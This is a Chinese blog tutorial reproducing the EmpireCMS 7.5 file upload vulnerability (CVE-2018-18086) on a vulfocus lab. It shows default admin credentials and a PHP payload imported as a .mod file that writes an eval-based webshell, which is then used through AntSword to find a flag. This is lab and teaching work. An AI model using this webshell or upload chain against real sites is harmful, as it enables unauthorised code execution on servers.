当前位置: 首页 > web >正文

vulfocus-empirecms 文件上传 (CVE-2018-18086)漏洞复现详细教程

关于本地化搭建vulfocus靶场的师傅可以参考我置顶文章

KALI搭建log4j2靶场及漏洞复现全流程-CSDN博客https://blog.csdn.net/2301_78255681/article/details/147286844

一、漏洞描述:

EmpireCMS(帝国网站管理系统)是一套内容管理系统(CMS)。 EmpireCMS 7.5版本中的e/class/moddofun.php文件的‘LoadInMod’函数存在安全漏洞。攻击者可利用该漏洞上传任意文件。 密码:admin/123456 后台路径:/empirecms/e/admin

二、漏洞复现:

1、来到vulfocus镜像管理界面,下载靶场环境,也可以在vulfocus官网直接启动靶场环境

Vulfocus 漏洞威胁分析平台https://vulfocus.cn/#/dashboard

2、来到后台页面

3、登录进入后台,账号密码admin/123456

4、寻找发现文件上传地点

5、导入木马文件666.php.mod,使他创建一个caidao.php的木马文件

<?php file_put_contents("caidao.php","<?php @eval(\$_POST[cmd]); ?>");?>

6、访问是否上传成功

7、使用蚁剑测试连接

8、在tmp目录下成功找到flag

http://www.xdnf.cn/news/215.html

相关文章:

  • 如何用Python轻松解析XML文件?
  • 【ELF2学习板】交叉编译FFTW
  • UNION和UNION ALL的主要区别
  • Freertos----互斥量
  • 【k8s系列4】工具介绍
  • 17-算法打卡-哈希表-快乐数-leetcode(202)-第十七天
  • Motion Tracks:少样本模仿学习中人-机器人之间迁移的统一表征
  • PyCharm Flask 使用 Tailwind CSS v3 配置
  • 基于若依的ruoyi-vue-plus的nbmade-boot在线表单的设计(七)后端方面的设计
  • 软考高项ITTO(输入——>工具——>输出)——【项目整合管理】
  • 番外篇 | SEAM-YOLO:引入SEAM系列注意力机制,提升遮挡小目标的检测性能
  • spring cloud gateway前面是否必须要有个nginx
  • FreeSWITCH中SIP网关(Gateway)操作
  • 操作系统-PV
  • C++23 新特性:行拼接前去除空白符 (P2223R2)
  • 嵌入式开发--STM32G4系列硬件CRC支持MODBUS和CRC32
  • 一个好用的高性能日志库——NanoLog
  • EnlightenGAN:低照度图像增强
  • CUDA Driver 安装与升级(CentOS 7)
  • Day(23)--反射
  • java的lambda和stream流操作
  • # 使用 PyTorch 构建并训练一个简单的 CNN 模型进行图像分类
  • 推荐一款Umi-OCR_文字识别工具
  • 黑马V11版 最新Java高级软件工程师课程-JavaEE精英进阶课
  • 基于 JSP 的企业财务管理系统:设计、实现与技术解析
  • C++ 面向对象关键语法详解:override、虚函数、转发调用和数组引用传参-策略模式
  • 招商信诺原点安全:一体化数据安全管理解决方案荣获“鑫智奖”!
  • 健康养生指南
  • 51单片机实验六:通用型1602液晶操作方法
  • java 排序算法-快速排序